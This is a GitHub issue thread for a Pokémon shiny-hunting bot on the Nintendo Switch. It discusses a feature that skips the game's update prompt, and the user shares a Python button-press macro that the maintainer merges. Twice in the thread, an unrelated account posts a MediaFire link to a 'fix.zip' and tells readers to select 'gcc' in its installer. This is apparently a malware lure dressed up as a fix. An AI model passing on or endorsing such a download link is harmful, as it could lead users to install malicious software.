### ISSUE TITLE
[new feature] Avoid updating game

### ISSUE THREAD

**Issue by David34920** [Dinones/Nintendo-Switch-Pokemon-Shiny-Hunter#19]
Hi, thanks for your work.

Is it possible to add an option to start/restart the game without updating it?

I just found a cartridge with version 1.1.2 and I want to stay to that version.

Here are screenshots when I press A button to start the game

![image](https://github.com/user-attachments/assets/a27558d8-b4af-49f9-86d0-25c81c35c7f8)

![image](https://github.com/user-attachments/assets/652281c5-c2c5-40cb-a464-8b2918b5a433)

Then we need to press up on the stick or the D-pad to select the "start anyway" option, note that we can press up multiple times

![image](https://github.com/user-attachments/assets/fc63e9ee-976e-418d-b1be-fd698ea043fc)

![image](https://github.com/user-attachments/assets/f919a08c-ddca-4c0d-95b3-12457386e0ea)

Ideally, we must verify that the top option is selected before pressing A again.

Thanks in advance,
David

**Comment by diablo00001** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by diablo00001** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by Dinones** [comment]
Hi! Thank you for the idea, and sorry for the late response! Of course, I can implement this functionality; it should not be difficult to do so.

Can you please tell me if the update game question pops up before or after asking which user you want to use if you have multiple accounts in your Nintendo Switch?

**Comment by David34920** [comment]
Thanks,

It pops before asking which user to select.

I see that you have some code that check if we are stuck for any reason then restart the game with HOME then X.
If its help, I just checked: pressing B or HOME bring back before the popup.
So, if stuck for any reason, pressing HOME then X give the same result than quitting the game for a reset.

**Comment by Dinones** [comment]
I have pushed a new version of the program, please download the latest version. You can either clone the repository again `git clone https://github.com/Dinones/Nintendo-Switch-Pokemon-Shiny-Hunter.git` or update the current one `git pull origin master` in your local repository folder.

In order to enable the one step forward before entering the combat, you should change the `MOVE_FORWARD_STATIC_ENCOUNTER` of the `Constants.py` script from `False` to `True`.

Right now, I'm not able to replicate the issue, so could you please confirm if it works? Please, remember that when you execute the program, the game has to be loaded _(see positions [here](https://github.com/Dinones/Nintendo-Switch-Pokemon-Shiny-Hunter/blob/master/Media/Docs/Starting%20Positions.md))._

**Comment by David34920** [comment]
Great thanks, I'll check it as soon as possible. I'm not at home this week.

**Comment by David34920** [comment]
It was almost it, one step was missing, I have added it.

The timings are not fine tuned, but seem working. See the video.

Here the modified method:

```python
# Fully restart the game (Hard reset)
def restart_game_macro(controller):
    if controller.previous_event == controller.current_event: return
    
    controller.current_button_pressed = 'HOME'
    controller.nxbt_manager.press_buttons(controller.controller_index, [Buttons.HOME])
    sleep(1.5); controller.current_button_pressed = 'X'
    controller.nxbt_manager.press_buttons(controller.controller_index, [Buttons.X]); sleep(0.5)
    if CONST.SKIP_UPDATING_GAME:
        sleep(0.5)
        # Validate close then show update popup
        for _ in range(2):
            controller.current_button_pressed = 'A'; sleep(0.2)
            controller.nxbt_manager.press_buttons(controller.controller_index, [Buttons.A])
            controller.current_button_pressed = ''
            sleep(0.8)
        for _ in range(3):
            controller.current_button_pressed = 'UP'; sleep(0.1)
            controller.nxbt_manager.press_buttons(controller.controller_index, [Buttons.DPAD_UP])
            controller.current_button_pressed = ''
    for _ in range(10):
        controller.current_button_pressed = 'A'; sleep(0.2)
        controller.nxbt_manager.press_buttons(controller.controller_index, [Buttons.A])
        controller.current_button_pressed = ''; sleep(0.1)

```

https://github.com/user-attachments/assets/82f31d62-08a3-42df-91cf-8ddcc2fb8024

**Comment by Dinones** [comment]
Thank you for the code! I'll change it!! I understand the video is recorded with your changes applied, right?

**Comment by David34920** [comment]
Yes, the video is with my update.

**Comment by Dinones** [comment]
Perfect! I uploaded a new version with your changes applied. Thank you very much!
